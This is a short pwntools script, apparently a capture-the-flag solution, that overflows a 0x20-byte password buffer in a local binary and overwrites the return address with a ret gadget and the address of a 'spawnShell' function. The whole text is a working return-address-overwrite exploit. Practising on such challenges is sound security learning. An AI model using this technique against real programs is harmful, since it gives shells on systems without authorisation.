from pwn import *
context.log_level = 'CRITICAL'  # Shush

e = ELF('./bin')
rop = ROP(e)
win = e.symbols['spawnShell']
ret = rop.find_gadget(['ret']).address

pl = b'A' * 0x20  # Fill the password buffer
pl += b'B' * 8  # Saved RBP
pl += p64(ret)  # Stack align for Libc quirk, effectively no-op
pl += p64(win)  # overwrite return address with address of win

sys.stdout.buffer.write(pl)